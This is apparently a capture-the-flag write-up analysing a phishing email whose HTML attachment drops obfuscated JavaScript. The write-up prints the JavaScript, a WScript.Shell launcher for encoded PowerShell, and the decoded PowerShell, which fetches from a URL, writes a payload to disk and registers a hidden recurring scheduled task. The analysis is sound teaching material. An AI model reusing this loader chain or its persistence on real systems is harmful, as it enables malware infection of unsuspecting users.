Hypercraft

A medium-level challenge focused on malware analysis and de-obfuscating malicious code.

CHALLENGE DESCRIPTION

This email seems to have come from one of our agents, Axel Knight, but Axel has been missing for weeks, and we believe him to be compromised. The email claims to have information that could be vital to our winning this war, but before we use it, we want to make sure it is safe to open. Analyze the given email and see if it's real, or if it's just the Arodorians trying to phish us, and find the flag.

Evidence

• hypercraft.eml

Solution

The challenge give us a .eml file which is an electronic mail format or email in plain text. so I will read it by using cat command line

The challenge provides us with a .eml file, which is an email in plain text format. I will read it using the cat command.

cat hypercraft.eml

Content-Type: multipart/mixed; boundary="===============2174251299668768024=="
MIME-Version: 1.0
Delivered-To: gabriel.wolfe@mod.zenium.htb
From: axel.knight@mod.zenium.htb
To: gabriel.wolfe@mod.zenium.htb
Subject: Urgent - Plans for Arodorian Hypercraft

--===============2174251299668768024==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

Many Zeniumites died to recover the information provided here. Attached you'll find the schematics for the latest hypercraft spaceship under development by the Commonwealth of Arodor Maximus. These plans are more sophisticated than we expected, and show that we are at extreme risk of losing the race, and ultimately, our freedom. Please get these to our top engineers immediately, of all hope for the Zenium is lost.

I'm uploading this over a low-quality long-distance link. If the cloud copy is corrupted, try the download. You must get these plans to leadership. You're our only hope.

-- Axel
--===============2174251299668768024==
Content-Type: application/octet-stream
MIME-Version: 1.0
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="[TOP SECRET] Arodorian Hypercraft.pdf.html"

PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuLXVzIj4KPGhlYWQ+Cjx0aXRsZT48L3RpdGxl
Pgo8L2hlYWQ+Cjxib2R5PgoJPG1haW4gY2xhc3M9ImJ3a3l0Y25sIiBpZD0ianphc2pucGMiIGRh
dGE9IkppcExkeVFzTmpRcWRYTS9OQzQ3Qnd0MEtrc0FWMFVOUHpnMEozSXpLRmN5S3k4WWNqRWNL
aTlWTkRJMktYQXlPQ3gvS1RBL1pCQjlNaWhCVzE5cUhRSUxDMWtKSHl0NVVUd3lIQUJjUDB3aExq
OElOaFE2Qkc0Q0F3UVhXeVFpTkNJaWRpQmlWQWd5SkRjS0JURXJVZ0o1QWprMlBXSjNJREl2SWlz
N0FTNHlMbnBIRUFvVERDRnhYeVUvQ2hRU1lFbzJBRDBNUUFBbEN3Y01CQjgwZFVaTkp3ZCtCenNJ
VGdBTEJnMEZSaFUvUzBnOEVqbHlOa05PWGxKOE4yMHFJQTVYZGowd0N3SjNFbHNVQmtKRVp4dEFO
azAzTVExWWR3eGRFbHN0T1JvYlJTeEROQXh2UURBT1d4UWpSVlpWQkZ3ZkdWd0NTUUJXRmdVVkNC
MFVXeXNvVG4xVFhBVmFJQnRvSUQ0T01rWmdkeFZPQUY0R1NEb1FRdzRDSFRkYk94SVlYQUU5RGg4
aUNod3dBaGxGVndZdFVFbzFIRmtOQmlNTmZ4WmFWRkk0S1RkSEh4c0ZYM3MrRlJGYmRTUWFJUWxP
VEI0WUd5TUdMVzVFUmhNcUhoNUtHMTgrVjFSWkkxUmJTRDlkU2k0R0V6a1JFd2QwQVFrZFhGRmJI
eklOS2p4WFZTODVQUlpUUUg0UEhCMERIUWhuUEFFbkFuWU1HQjBCQ0VZTEJoSWpUVHdPQnlBTkNn

...

dW9zY3Zka3JjcmZvZXZpdGlpZmV4c2h1Y3VtYWJidmxiZGxndmhpa3Jxc3VheXN6ZG1qZWRldGxt
b3dheHBmZHFub3phcHRkYmlrY2R5d3Ntd3pnaWh6aXhwdGFxbmpyZGFwamtldnJ6cWR6cnRzbXZm
bWFzZml4aHd5aG56dWVyaW1zdXFseWx6ZWxtbmFyc20iPjwvZGl2PjwvYm9keT4KPC9odG1sPgo=

--===============2174251299668768024==--

This email was sent from axel.knight@mod.zenium.htb, a person who has been reported missing for a week. The content seems suspicious, as the sender tries to convince the recipient that the email contains an important attachment and urges them to download it. Additionally, the sender asks the victim to spread the suspicious attachment. To determine whether the attachment is malicious, we need to extract it from .eml file.

I will use EML Extractor to complete this task. After successfully cloning the project, I used the following command line to extract the attachment:

python3 eml_extractor.py -f <FILE_PATH> -d <FILE_OUTPUT_PATH>

After running the command, we received a folder named Urgent - Plans for Arodorian Hypercraft, which contains a file called [TOP SECRET] Arodorian Hypercraft.pdf.html.

Now, I will conduct the static analyst on this suspicious file. First, I will get the MD5 hash value of this file then search this value in Virustotal.

$ md5sum '[TOP SECRET] Arodorian Hypercraft.pdf.html' 
d1af9dfcd67ac678a1f52ea9bd4784e1  [TOP SECRET] Arodorian Hypercraft.pdf.htm

Virustotal result

According to VirusTotal, this file was labeled as trojan.cryxos/leonem. When I researched the Behavior tab, I realized that this file drops another file named [TOP SECRET] Arodorian Hypercraft.pdf.js.

Files Dropped

To achieved this js file, we need to perform dynamic analyst

!!!!NOTE!!!!: To complete this task, we need to run the file in an isolated Windows environment that has no internet connection, and with Windows Defender turned off. Be sure to take a clean snapshot of your environment before running the malware, so you can revert to a clean state once you've finished the analysis.

We will trigger the file by double-clicking on it. A webpage will open, and a file named '[TOP SECRET] Arodorian Hypercraft.pdf.js' will be downloaded.

webpage

javascipt file

Let's take a look at the code inside.

TOP SECRET javacript code

We can observe that the code has been obfuscated. To make it more readable, I have removed unnecessary comments and cleaned up the code, as shown below.

var yqybdscl = "Vs7V8VVV68s68s7VVV774...VV6ssss1VsVss";
var zuloqgnm = yqybdscl + "VssV6s665VVV...VsVV93V454V5ssV442";
var eplicmqe = zuloqgnm + "4V6sVVss5ssV3...V4VV6VsVsVVss";
var uwetjyhi = eplicmqe + "sssbs5V654VVs6V...VV0sVVVssVa";

var hfhwsgmb = 532;

while (hfhwsgmb > 0) {
    hfhwsgmb = Math.floor(Math.random() * 10000)+1;
    switch (hfhwsgmb)
    {
        case 532:
            hfhwsgmb = uwetjyhi.replace(/[sV]/g,'');
            var ooqajrjz = "";
            for (var ioxpkxez=0;ioxpkxez<hfhwsgmb.length;ioxpkxez+=2)
            {
                ttjqepbj = hfhwsgmb.substr(ioxpkxez,2);
                ooqajrjz += tjkdjlll(kmbvxuoa(ttjqepbj, 2519-2503));
            }
            cyfgvptr(ooqajrjz);
            hfhwsgmb = -532;
            break;
    }
}

function kmbvxuoa(eutxbhhz,eiexokbr){
    ifhzpbrq = parseInt(eutxbhhz,eiexokbr);
    return ifhzpbrq;
}

function cyfgvptr(phfljyaj) {
    (Function(phfljyaj)());
}

function tjkdjlll(dbcsdyyw){
    var zjxkhodr = String.fromCharCode(dbcsdyyw);
    return zjxkhodr;
}

With the readable version, we can easily understand what the code is doing. The attacker attempts to assign an encoded value to a variable, and the rest of the code tries to decode the value of the uwetjyhi variable. We can see that the cyfgvptr() function is called with a decoded text parameter, which seems to execute the parsed code. Therefore, we will print the parameter out.

function cyfgvptr(phfljyaj) {
    //(Function(phfljyaj)());
    console.log(phfljyaj)
}

Save the cleaned code to a JavaScript file and run it. The result will print out a new JavaScript code

xhhwtarcadepz = function(suadklsw) {
var twgoctfv={};
var qhypodermichff = 74142;
var vyafisoftcoverqa = false;
var aqMonsantoo = "undefined";
var qluypartitionswl = false;
var zwbwopamphletkzca = false;
var iibigrqb;
var kyieithero = null;
var xglistenicl = null;
var tsrjtemplelrhz = "undefined";
var mdijwdetachw = null;
var yghnplatypuszfwv = 60163;
var gqpsaltyoem = null;
var vbasemanozbcu = 39296;
var tsyphiliticddc = true;
var xulqdiurnald = "undefined";

...

if ((qhchhvwd - yjdednyw) > (14*60*(693+235)) ){
ugerrorfkln[ynvjonvw[606-603]](ynvjonvw[56969-56967], keCarthagedf);
var juoqcpeakyspzxe = null;
var xhsqdoggingjtqhu = 73338;
var qdiploidypdme = "undefined";
break;
var xhsgprocaineciynd = 48992;
var fozosemix = "undefined";
var cifloebukri = "undefined";
var ekbuxomppse = "undefined";
var uzMcGillcwe = null;
var fkwiggleocgh = "undefined";
var hpnandesinela = false;
var tskscouplero = false;
var lriddlernlxx = null;
}
}
;
var jdrmocontactw = 88628;
var tfjboclutchwgdsp = true;
var kycinferringpz = false;
var eluvespereo = false;
var zlpremorsefulv = "undefined";
var yhikwMaggiey = 37493;

Upon examining the code, I noticed it contains many redundant variables that are not used in the program. Therefore, I will remove these unnecessary variables to make the code easier to read. Below is the cleaned version of the code.

xhhwtarcadepz = function(suadklsw) {
    var twgoctfv = {};
    var iibigrqb;
    var ldarlpqp = 0;
    var aipywtro;
    var hsfmolvo;
    var lkcbpepr = 0;
    var xolcqgjr;
    var rstkcnio = '';
    var enspnabr = String.fromCharCode;
    var cgopmyzu = suadklsw.length;
    var uvitiluo = "ABCDEFGHIJKLMNOPQRS";
    var anqueniw = uvitiluo + "TUVWXYZabcdefghijklmnopqrstu";
    var derxyhbz = anqueniw + "vwxyz0123456789+/";

    for (iibigrqb = 0; iibigrqb < 64; iibigrqb++) {
        twgoctfv[derxyhbz.charAt(iibigrqb)] = iibigrqb;
    }
    wlliykhz = 8;
    xvqehhfj = 255;
    kdtujfic = xvqehhfj - 253;
    cpnyehmi = wlliykhz - kdtujfic;
    for (hsfmolvo = 0; hsfmolvo < cgopmyzu; hsfmolvo++) {
        aipywtro = twgoctfv[suadklsw.charAt(hsfmolvo)];
        ldarlpqp = (ldarlpqp << cpnyehmi) + aipywtro;
        lkcbpepr += cpnyehmi;
        while (lkcbpepr >= wlliykhz) {
            ((xolcqgjr = (ldarlpqp >>> (lkcbpepr -= wlliykhz)) & xvqehhfj) || (hsfmolvo < (cgopmyzu - kdtujfic))) && (rstkcnio += enspnabr(xolcqgjr));
        }
    }
    return rstkcnio;
};

var keCarthagedf = 0;
var yjdednyw = new Date();
var atojqpvq = "YWtpaXNxYmNxemJlZ3V0aW50aGFsb...zZ0b3ZZdjZTOTg2anZ";
var svmnayxo = atojqpvq + "OUmRHaFM3Mk5MR0tsNys5Q2lQQk5pUGI4TTBF...kprSEQ5SUIvQzl0eGo";
var wtuvcrbr = svmnayxo + "vWXR4c1JqOUwwbjFZN0xpVi9w...3B0UDY3ZzZBVEduWjQxTG5QRWdvd1l";
var tiogqfbg = wtuvcrbr + "aVEZka";

var vftbkkmw = tiogqfbg + "ktPWmxFaGFlOHJMT09LaX...TTgvUjRZdURnc0d2aTQzcDJpT3";
var bxmanhtn = vftbkkmw + "hzUHJPbjJneUxmbzRMNXY1T3lxZ1BsU2tVW...5wb3ZuYWNwbGRsend6a2lpdmVv";
var ynvjonvw = xhhwtarcadepz(bxmanhtn).split("!");

ugerrorfkln = new this[ynvjonvw[94052 - 94048]](ynvjonvw[75319 - 75318]);

ugerrorfkln.PopUp("This document is corrupt.", 10, "ERROR", 48);

while (true) {
    WScript.Sleep(10);
    
    var qhchhvwd = new Date();
    if ((qhchhvwd - yjdednyw) > (14 * 60 * (693 + 235))) {
        ugerrorfkln[ynvjonvw[606 - 603]](ynvjonvw[56969 - 56967], keCarthagedf);
        break;
    }
};                  

With the cleaner code, I have quick summary of this:

• The function xhhwtarcadepz will decode the encoded message that is passed to it.

• Variable bxmanhtn contains the encoded message

• Variable ynvjonvw will contains the output of xhhwtarcadepz function (a readable message)

• The variable ugerrorfkln seems to execute the result from the variable ynvjonvw. The execution is triggered after a certain duration.

Therefore, I will print out the ynvjonvw variable and comment out the execution section

var ynvjonvw = xhhwtarcadepz(bxmanhtn).split("!");
console.log(ynvjonvw)
// ugerrorfkln = new this[ynvjonvw[94052 - 94048]](ynvjonvw[75319 - 75318]);

// ugerrorfkln.PopUp("This document is corrupt.", 10, "ERROR", 48);

// while (true) {
//     WScript.Sleep(10);
    
//     var qhchhvwd = new Date();
//     if ((qhchhvwd - yjdednyw) > (14 * 60 * (693 + 235))) {
//         ugerrorfkln[ynvjonvw[606 - 603]](ynvjonvw[56969 - 56967], keCarthagedf);
//         break;
//     }
// }; 

Run the javascript and we will see the result

node file_name.js

[
  'akiisqbcqzbegutinthalocycpyvjexcdqaouloezjybswhekavemrehcdsbxrloedzmynhszgggpumsojoovqlipkbtoqjjkerldknkffjsnecwvbuzysqnwkoidbkr',
  'Wscript.Shell',
  "PoweRShElL -EXEcU  byPAss    'IEx(NEW-oBJeCT  SYsTeM.iO.COmpResSion.dEfLaTestReAm( [SySTem.IO.meMOrYStReAm] [convert]::FromBase64String(''jVf7b+JIEv59/ooW4tagBI53HquTzkkYQjaQBEwgMzdSN9AQT4whtgkwHP/71lcd25m9G90haOzuqq9eD5dFv+kU2lGzI3KZRzvIHGXaipYL+nn6vPajlMkLkfvq7FbNb7nMvnLYVw/78mFfOmREYWYtp67fso6tovYv6S986jvNRdGhS72NLGKl7+9CiPBNiPb8M0EJkYAxjIFksDv/URNn/yl0mp3ihC4D+jkxTPgocla9+WgdWV6fNnNfo91KvwMRCqv0WVhNYmovodSsfWvljQa/EVmNNSf9WWqmMBNW4ELVqEDrJOospyw/wkICCo86CN2lLyqfZmt/EuFy8DSR21eRy+6drlzow3F2f/n8IudL2V57h7zYfyJrxWwZgESvF9LrbGV3N5gfxD9E6XeBTbm4lZ1t92lNmwUvoj1HdjvNQzEzkXcDP8qArLmWnVvD2zocHcXI9InJvxLWoEMC5MjfrVuHbySBhEayu3g/XMjbBSFIc1oYb0mt7H4ir/9oLaU7IH0Z88BroKN14CNC82ZUeFO9tj32NKVFjXLhC+dB4VHd5s/PM3YoL103U8zMm04oHdlr+/MMRHdlRxPoIfVXbyKv7EheqhtH7N9F5MrFYrkh/i2KOetvVn4vrH3pfHSwKAdEDoEyWVHmrBBWC0FR/nS5oP+o0ENkOmoryo28II8Xvi9dX1jW4RM5TcIhCznq7uSg9ePH3R3cHmPGgIMdcnX7yjnU34WRXhQvdpH++u2b+GeutC2p49K23EiWCi31U1pq03gpl+PTEm5LGssJlknMYfaqyR44arhK4UulBM9cUbKenebJkHD9IB/C9txj/YtxsRj9L0n1Y7LiV/pXIaoKUdUGIZ6WgDiSodz6aiUfm4lPDCZV3jvg5a8QazCoDFtO2AXA5uUEbqnzXnJl6GBQHVf1WXxQx545hYb1enxag6uYuMbEzAYvMShzNMYJRxIOw4EDZjN00Co9qJ/F8A1GrsV7rMu7QuSjBvnot5w1mZIHyFd9qhqbXKWRVJNdTz6N5Ob5tfMxGnHHoYCgYfTQQq5s59K+oZ5zxFQm5/6flGsgd6pQsQK1q4p0OqkiblS93dZ/y4IpAa42JCuRhKbGR86yH6F1orn5cytfbPtvyxedy4sjYf3LopWtehpt5LUkq0jMcLzpyLl8uEhEcQWa/BDWDUwk22AoWYmuemTIzOMgcYahtPEEiKmJmASs5U1vCPDsB9ewtpvnpSLKhWsIm4PO7WIkqT22+nJoj6V317z/iwNIzu69Cn7lUc44k63ImmpSupzLjST8TFeF+zlNTpAhHA3Ob864D9nKic/phPQ0KEi2Kk4bSMoGCptP67g6ATGnZ41LnPEgowYZTFdjKOZlEhae8rLOOKiyalwbbFGiM/OaCmOdWQPeYzbcGtvYhLTWIJdBjX4JnkHhJsK8oGNPNlIf4MDwsuLcHdkOrrpExgk3CUZmAF5YGhb2MyNzy6qzS1Kf4ortNbzsK/ZLEkHWjxuC0Y+riM2H3DQeNdYl7TyJlSmd8TMDpLHkns0eZ5FpPFgr3LLiJl94j3XhoCS2cczZ8lQGR8vEMslTox+jsCPYB+hV1TMqt1r+dyqOQDZ742HUe0NBiKw7n52fm6qIxxqacrhiVagbNSqQzwE/N6khuD79X9DvQ0cw44gnOzRCyME8HEr7wpN3zRWPBrk5jUaPKnDt8S1NAu/D1y1mI8wCNAr8pRVaVIAhSdjwXBVp5Xnjj8KomfktzEw93ZMXG+n0Hg9slwrlyw+5upaDlf09Kfa4f1orYFJv/rnX0UHS6WDbf3Y6Qn57WMn+xUjOdwYXz73EV3ELoiZ1HHcu07ZML1JSRz0ZTuUs4U3aIjNSCyLuLdbB069a0RnCeYrCOEOcFcpmjOhqFIHCgUIeniKlx7wg7OaW6UByikTWoFOMknLg4Ax5yLeMN4ZIZuNbPtBIS1WhXKpU+NESyZfXgIbR/uz+CvZZGTwafpoMxP8cDSrI+AqXQvKc5tTlAzOFwBpzwG2DiVFfzFYxp3jg1RG2TJYGV5pb8QD48mV5lw3Xr699t3X79yzFMhyPWrvv+QziS+qSFbr3ICccn3fFacynADc4wPX4ceGo8MXmkZTM6epNoU//HiZL/CbPtOCBOl1jumySn9eRJlVU/48vq+v1vfqeneyCp9GQhgCKvB3M1wvt8+j+Ih9kb+GF8vPqCk/SaNW9urmXG2krKPVxWoBqpBdpV2elIDXWBa87ego1702latKFtt2V8qAq6ZXJDm6CTQZ52V7P5FTuhioMYiHm7YYMNqLe36nc+RwGkozJM8/R4YuDgsGvi43p2iOxsPrOn2gyLfo4L5v5OyqgPlSkUYH2dHqldmGuTCw9vdKRC6+2/UgHb8pL0iftCSsV+9xxF/yCBWnAED9jXK0DxS8NH0YsLlX4KsXArKDhspWKgXLVRp0Ldio3kWMPX7exV8gf5BgyhvxuumQ8JLHZ9Mr6Aqgocv152NdoAam/OALsJZZ07U6n2qeXj7UXuStPt/0wUuS0kF6Sfmoo1r2CfzUCRy0QvLbnLTf9SAVRe3bnX6iI3OXq8FM6aZFqJj0IidOD5jiAzF10VIyXxIIX1TSScfggAJnTVQtNKTkcDxeY5cb0emlyHu+TgXxFmRScADmBF0G7LQeURk80ZfUpjQpkPruBjqZD6Rg//gk=''),[SyStEM.IO.COMPreSSION.cOMPRessIONmodE]::DECOMPReSS)| FOrEach{NEW-oBJeCT  iO.sTReAMREaDEr( $_,[SYsTeM.TExt.eNcodiNg]::AsCii ) } ).reaDTOEnd( )'\n",                                                               
  'run',
  'ActiveXObject',
  'kdqbvzfpmscejstipmozjcjwluruhaufghutroaypxxmmapeqtcvxnounkpqlizdukfxifkyqgyioopdphkehrdlfiozvoximzgzagkixopenpovnacpldlzwzkiiveo'
]

We can notice that an powershell script will be executed in this code. However, this script is encoded. I will use Cyberchef to decode it

Cyberchef decode powershell script

//Powershell script

 SET-ItEM ("VAr"+"Ia"+"B"+"le:4z0")  ([TypE]("{2}{3}{1}{0}" -f'odinG','.enC','sYSTEm.T','ext')  )  ;   sv  IgF  (  [TypE]("{1}{0}{2}{3}" -f'OnVe','SYsTEM.c','r','T')  )  ;sV ('5EV'+'lS') ([type]("{1}{2}{0}" -F 'E','Io','.fIL'))  ;  &("{4}{1}{3}{0}{2}"-f 'ri','et-','ctMode','St','S') -Version 2
function UYc`xq (${TN`me},${Chk`go`Iul}) {
    for (${eum`lMx`NyUg} = 0; ${eu`mL`MxNYug} -lt ${T`NME}."c`OUnt"; ${Eu`MLMx`NyUG}++) {
       ${T`NME}[${eUM`lM`XnyuG}] = (${t`NmE}[${eUm`Lmx`N`yuG}] -bxor ${c`HKGo`iUl})
    }
    return  ( gEt-vaRIAble ("4"+"Z0")  -VaL)::"As`Cii"."gETs`T`RIng"(${tN`Me})
}
function Rc`DAt`CaJT {return (1..16 | .('%'){ '{0:X}' -f (&("{0}{2}{1}" -f 'Ge','andom','t-R') -Max 16) }) -join ''}
${E`UM`lm`XNy`UGzzOO} = (&("{0}{1}" -f 'UyC','xq') ([System.Byte[]] @(0x0a,0x16,0x16,0x12,0x58,0x4d,0x4d,0x11,0x16,0x0d,0x0e,0x07,0x0c,0x12,0x0e,0x03,0x0c,0x11,0x4c,0x0a,0x16,0x00,0x4d,0x10,0x4d)) 98)
${suQ`QsIgl} = (.("{1}{0}" -f 'Cxq','Uy') ([System.Byte[]] @(0x31,0x3c,0x36)) 80)
${X`s`xnap`VE} = (&("{1}{0}"-f'xq','UyC') ([System.Byte[]] @(0x42,0x13,0x7d,0x4c,0x4c,0x78,0x5d,0x48,0x5d,0x13,0x70,0x53,0x5f,0x5d,0x50,0x13,0x71,0x55,0x5f,0x4e,0x53,0x4f,0x53,0x5a,0x48,0x13,0x6b,0x55,0x52,0x58,0x53,0x4b,0x4f,0x13,0x6c,0x53,0x4b,0x59,0x4e,0x6f,0x54,0x59,0x50,0x50,0x13)) 60)
&('cd') ${XSx`NAp`Ve}
${cyR`YX`whqM} = (.("{1}{2}{0}" -f 't','R','cDATCAJ'))+(.("{0}{1}"-f 'UyC','xq') ([System.Byte[]] @(0x67,0x3f,0x2b,0x3a)) 73)
${N`yNG} = (.("{1}{0}" -f 'd','pw')).("{0}{1}{2}" -f 'ToStr','i','ng').Invoke() + '\' + ${cyRYXw`H`qM}
${WbwM`g`QB} = (.("{2}{1}{0}"-f 'Jt','TCA','RcDA')) + (.("{3}{1}{2}{0}" -f'Jt','AT','CA','RcD'))
${u`JRW} = $(.("{0}{1}" -f 'whoa','mi'))
${EUMLmX`NYuGS`WAb`lOEP} = (.("{1}{0}"-f'yCxq','U') ([System.Byte[]] @(0x5d,0x7d,0x45,0x3d,0x4d,0x42,0x60,0x50,0x5d,0x37,0x4e,0x74,0x67,0x4c,0x55,0x71,0x55,0x5c,0x4e,0x6a,0x60,0x53,0x35,0x68,0x66,0x6a,0x56,0x7e,0x4f,0x40,0x45,0x74,0x47,0x6a,0x4a,0x68,0x60,0x47,0x46,0x7e,0x4d,0x40,0x34,0x63,0x55,0x37,0x4e,0x68,0x5d,0x5c,0x56,0x68,0x50,0x36,0x4e,0x75,0x5e,0x53,0x4a,0x34,0x4f,0x47,0x4e,0x5c,0x51,0x36,0x4a,0x7d,0x65,0x5c,0x46,0x34,0x48,0x68,0x4a,0x6b,0x5e,0x53,0x7c,0x77,0x4d,0x6d,0x6f,0x4f,0x67,0x7d,0x31,0x57,0x60,0x53,0x30,0x63,0x4d,0x6a,0x46,0x72,0x60,0x36,0x52,0x7d,0x67,0x36,0x6c,0x68,0x66,0x43,0x73,0x71,0x5e,0x5c,0x6c,0x68,0x4d,0x47,0x35,0x68,0x61,0x43,0x52,0x6e,0x4d,0x43,0x4e,0x31,0x67,0x43,0x42,0x7e,0x67,0x7d,0x45,0x6d,0x4d,0x47,0x5d,0x63,0x5d,0x7d,0x73,0x73,0x47,0x63,0x39,0x39)) 4);
${r`ERbWtRv} =  $igf::("{1}{3}{0}{2}{4}"-f 'ase64','From','Strin','B','g').Invoke(${eu`ml`MXny`UgsW`ABl`OEp})
  (get-VariAbLe ('5EV'+'LS')  -Va)::("{1}{2}{0}" -f'ytes','wri','teallb').Invoke(${N`ynG},${ReR`Bw`TRV});
${as`kz`pH`UpAj} = (.("{0}{1}"-f'p','wd')).("{0}{1}{2}"-f'ToStr','in','g').Invoke() + '\'
${vQp`SBX`gyj} = (&("{3}{0}{2}{1}" -f 'cD','Jt','ATCA','R'))
${a`etR`sd`f} = (&("{2}{1}{0}" -f 'q', 'cx', 'UY') ([System.Byte[]] @(0x97,0x8b,0x9d,0xa4,0xb3,0xef,0xab,0xac,0x80,0xb0,0xb9,0x80,0xb3,0xeb,0x86,0xec,0xad,0xac,0x80,0xb6,0x91,0x80,0xab,0xb7,0xeb,0xab,0x80,0xee,0xa2)) 223)
${t`kqr`mLSfPD} = '"' + (&("{1}{0}"-f 'xq','UyC') ([System.Byte[]] @(0x22,0x2e,0x33,0x6b,0x63,0x22,0x3c,0x39,0x6b,0x66,0x3e,0x38,0x2e,0x29,0x6b)) 75) + "$eUmLmxNYuGZZoO$suqqSiGL/$vQpsbXGyj)" + '"' 
${eRQ`cf} = &("{1}{4}{3}{6}{2}{5}{0}"-f'TaskAction','New-S','le','e','ch','d','du') -Execute "$aSKZpHuPaj$cyrYXWhqM" -Argument ${Tk`Q`Rmls`FpD}
${tpNDJP`w`Aa} = .("{1}{2}{0}{4}{6}{3}{5}"-f'h','New-S','c','edTaskPrin','edu','cipal','l') "$UJrw"
${aIuf`d`yWasr} = .("{4}{1}{5}{2}{0}{3}" -f'igge','w-Sche','askTr','r','Ne','duledT') -Once -At (&("{0}{1}"-f 'Get-D','ate')).AddDays(1) -RepetitionInterval (&("{1}{2}{0}" -f'pan','New-Time','S') -Days 1) -RepetitionDuration (.("{1}{2}{3}{0}"-f'n','New-Ti','meS','pa') -Days(365))
${d`wtTAWqx} = .("{5}{4}{0}{6}{1}{3}{2}" -f 'ledT','skS','ttingsSet','e','w-Schedu','Ne','a') -Hidden -MultipleInstances ("{0}{2}{1}" -f'Par','el','all') -AllowStartIfOnBatteries
.("{2}{1}{3}{4}{6}{0}{5}"-f 'T','egis','R','ter-','Sche','ask','duled') -TaskName ${WbWm`g`Qb} -Action ${Er`qcf} -Trigger ${AI`Uf`dY`WASr} -Settings ${dW`TTAWqx}

Quick summary:

• Function UYcxq will decode the encoded message

• After decode process by function UYcxq, the result will be save in variables: EUMlmXNyUGzzOO, suQQsIgl, XSxNApVe, aetRsdf, tkqrmLSfPD

• The code will set up new scheduled Task to run the malicious

We can use powershell to print out all the command line that was obfucated

We will print out the value that was saved in those variable. This will be done by run the code below in the powershell

Flag: HTB{l0ts_of_l4Y3rs_iN_th4t_1}